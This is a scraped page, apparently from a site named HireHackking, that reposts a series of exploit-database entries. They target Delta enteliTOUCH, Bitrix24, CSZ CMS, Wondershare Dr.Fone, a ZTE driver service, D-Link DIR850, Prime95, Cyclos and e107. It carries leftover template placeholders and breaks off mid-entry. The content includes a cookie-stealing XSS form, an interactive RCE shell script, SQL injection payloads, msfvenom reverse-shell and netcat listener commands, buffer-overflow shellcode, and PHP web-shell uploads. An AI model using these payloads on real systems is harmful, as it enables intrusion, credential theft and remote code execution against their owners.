# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS) # Exploit Author: LiquidWorm <!DOCTYPE html> <html> <head><title>enteliTouch XSS</title></head> <body> <!-- Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS) Vendor: Delta Controls Inc. Product web page: https://www.deltacontrols.com Affected version: 3.40.3935 3.40.3706 3.33.4005 Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS. Desc: Input passed to the POST parameter 'Username' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML code in a user's browser session in context of an affected site. Tested on: DELTA enteliTOUCH Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5703 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php 06.04.2022 --> <form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST"> <input type="hidden" name="userInfo" value="" /> <input type="hidden" name="UL&#95;SelectedOptionId" value="" /> <input type="hidden" name="Username" value=""><&#47;script><script>alert&#40;document&#46;cookie&#41;<&#47;script>" /> <input type="hidden" name="formAction" value="Delete" /> <input type="submit" value="CSRF XSS Alert!" /> </form> </body> </html>
HireHackking

Bitrix24 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated) # Date: 4/22/2022 # Exploit Author: picaro_o # Vendor Homepage: https://www.bitrix24.com/apps/desktop.php # Tested on: Linux os #/usr/bin/env python #Created by heinjame import requests import re from bs4 import BeautifulSoup import argparse,sys user_agent = {'User-agent': 'HeinJame'} parser = argparse.ArgumentParser() parser.add_argument("host", help="Betrix URL") parser.add_argument("uname", help="Bitrix Username") parser.add_argument("pass", help="Bitrix Password") pargs = parser.parse_args() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] inputcmd = input(">>") s = requests.Session() def login(): postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password} r = s.post(url+"/stream/?login=yes", headers = user_agent , data = postdata) def getsessionid(): sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en", headers = user_agent) session = re.search(r"'bitrix_sessid':.*", sessionid.text) extract = session.group(0).split(":") realdata = extract[1].strip(" ") realdata = realdata.replace("'","") realdata = realdata.replace(",","") return realdata # print(r.text) def cmdline(cmd,sessionid): cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'} usercmd = s.post(url+"bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers = user_agent, data = cmdline) soup = BeautifulSoup(usercmd.content,'html.parser') cmd = soup.find('p').getText() print(cmd.rstrip()) login() sessionid = getsessionid() while inputcmd != "exit": cmdline(inputcmd,sessionid) inputcmd = input(">>")
HireHackking

CSZ CMS 1.3.0 - 'Multiple' Blind SQLi

HACKER · %s · %s

# Exploit Title: CSZ CMS 1.3.0 - 'Multiple' Blind SQLi # Date: 2021-04-22 # Exploit Author: Dogukan Dincer # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download # Version: 1.3.0 # Tested on: Kali Linux, Windows 10, PHP 7.2.4, Apache 2.4 # Discovery of Vulnerability - First go to CSZ CMS web page - then go to http://yourhost/plugin/article directory on CMS. - To see the error-based SQLi vulnerability, the ' character is entered in the search section. - It is determined that the "p" parameter creates the vulnerability. - Databases can be accessed with manual or automated tools. # Proof of Concept http://127.0.0.1/csz-cms/plugin/article/search?p=3D1'") UNION ALL SELECT CONCAT(0x717a7a6b71,0x5449414d6c63596c746759764a614d64727476796366686f4e6a7a474c4a414d6b616a4269684956,0x716a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - # Sqlmap output: Parameter: p (GET) Type: error-based Title: MySQL >=3D 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: p=3D1'") AND EXTRACTVALUE(8555,CONCAT(0x5c,0x717a7a6b71,(SELECT (ELT(8555=3D8555,1))),0x716a717a71))-- OUUO Type: time-based blind Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) Payload: p=3D1'") AND (SELECT 3910 FROM (SELECT(SLEEP(5)))qIap)-- ogLS
HireHackking

Wondershare Dr.Fone 11.4.10 - Insecure File Permissions

HACKER · %s · %s

# Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions # Date: 04/25/2022 # Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec) # Vendor Homepage: https://drfone.wondershare.com/ # Software Link: https://download.wondershare.com/drfone_full3360.exe # Version: 11.4.10 # Tested on: Windows 10 64-bit # Note: The application folder "Wondershare Dr.Fone" may be different (e.g it will be "drfone" if we download the installer from the italian website) # Description: The application "Wondershare Dr. Fone" comes with 3 services: 1. DFWSIDService 2. ElevationService 3. Wondershare InstallAssist All the folders that contain the binaries for the services have weak permissions. These weak permissions allow any authenticated user to get SYSTEM privileges. First, we need to check if services are running using the following command: wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto LocalSystem Running Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe Auto LocalSystem Running Wondershare Install Assist Service Wondershare InstallAssist C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto LocalSystem Running Now we need to check if we have enough privileges to replace the binaries: icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone" Everyone:(OI)(CI)(F) <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit) ... icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps" Everyone:(I)(OI)(CI)(F) <= same here ... icacls "C:\ProgramData\Wondershare\Service" Everyone:(I)(OI)(CI)(F) <= and here ... # Proof of Concept: 1. Create an exe file with the name of the binary we want to replace (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help") 2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\) 3. After replacing the binary, wait the next reboot (unless the service can be restarted manually) As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener: simple payload: msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe listener: nc -nlvp <YOUR_PORT>
HireHackking
# Exploit Title: UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path # Discovery by: Edgar Carrillo Egea // https://twitter.com/ecarrilloeg # Discovery Date: 2022-04-24 # Vendor Homepage: https://www.zte.com.cn/global/ # Tested Version: 2.0.3.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\Users\edgar>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ UDisk Monitor Z5 Phone UDisk Monitor Z5 Phone C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe Auto C:\Users\edgar>sc qc "UDisk Monitor Z5 Phone" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: UDisk Monitor Z5 Phone TIPO : 110 WIN32_OWN_PROCESS (interactive) TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : UDisk Monitor Z5 Phone DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\edgar>systeminfo Nombre de host: DESKTOP-810865D Nombre del sistema operativo: Microsoft Windows 10 Pro Versión del sistema operativo: 10.0.19044 N/D Compilación 19044
HireHackking

DLINK DIR850 - Open Redirect

HACKER · %s · %s

# Exploit Title: DLINK DIR850 - Open Redirect # Product: Dlink # Model: DIR850 # Date: 14/1/2022 # CVE: CVE-2021-46379 # Exploit Author: AhmedAlroky # Hardware version: b1 # Firmware version: ET850-1.08TRb03 # Vendor home page: https://www.dlink.com/ #Exploit : Visit http://<IP Address>/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1
HireHackking

Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: Prime95 Version 30.7 build 9 - Remote Code Execution (RCE) # Discovered by: Yehia Elghaly # Discovered Date: 2022-04-25 # Vendor Homepage: https://www.mersenne.org/ # Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip # Tested Version: 30.7 build 9 # Vulnerability Type: Buffer Overflow (RCE) Local # Tested on OS: Windows 7 Professional x86 # Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE # 1- How to use: open the program go to test-PrimeNet-check the square-Connections # 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will open buffer = "A" * 144 jum = "\xd8\x29\xe7\x6e" #push esp # ret | {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll) nop = "\x90" * 20 #Nob hot = "C" * 100 #sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payload payload = b"" payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d" payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d" payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6" payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2" payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a" payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff" payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f" payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca" payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d" payload += b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0" payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b" payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50" payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d" payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12" payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d" payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63" payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f" payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa" payload += b"\xc7\x33\x80\xb2" evil = buffer + jum + nop + payload file = open('PExploit.txt','w+') file.write(evil) file.close()
HireHackking

Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS) # Date: 18/04/2021 # Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services # Vendor Homepage: https://www.cyclos.org/ # Version: Cyclos 4.14.7 (and prior) # Tested on: Ubuntu # CVE : CVE-2021-31674 # Description: Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefined enum. # Steps to reproduce: An attacker sends a draft URL [IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim. When a victim opens the URL, XSS will be triggered.
HireHackking

e107 CMS v3.2.1 - Multiple Vulnerabilities

HACKER · %s · %s

# Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities # Date: 30/04/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Vendor Homepage: https://e107.org/ # Software Link: https://e107.org/download # Version: 3.2.1 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### XSS Reflected - Via adding comment (Authenticated) # POC Request: GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40 Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 08:02:42 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "71d7966eaa95fd8ac14da8baf3e0785d" Content-Length: 25059 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 [...] <div class='media' > <form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1' > [...] User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field image.png ### Upload restriction bypass (Authenticated [Admin]) + Stored Xss. Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file) image->media manager->upload a file->Image/File URL admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg # POC Request: POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 90 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption= Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 02:06:14 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "06ed5ef56b0f736995112cafd77e9ec0" Content-Length: 20878 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr [...] <div class='well clearfix media-carousel-item-container'> <a data-toggle='context' data-bs-toggle='context' class='e-media-select ' data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span> </a> [...] image.png ### Upload restriction bypass (Authenticated [Admin])+RCE Upload and execute .PHP file Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory. image.png Media Manager-> Media Upload/Import -> From a remote location # POC Request POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 09:02:08 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "5b9621fc78893e36034b14f841f840f8" Content-Length: 26075 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr [...] We can see uploaded PHP file on the server side. image.png cmd.php file source: <?php system('whoami'); ?> image.png ### Upload restriction bypass (Authenticated [Admin])+ Server file override Attacker can override example top.php file in the main directory of web application. Original file top.php in server: image.png We can override file via following upload functionality: Media Manager-> Media Upload/Import -> From a remote location # POC Request: POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 09:20:10 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "5b9621fc78893e36034b14f841f840f8" Content-Length: 26075 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 [...] top.php file content was tampered: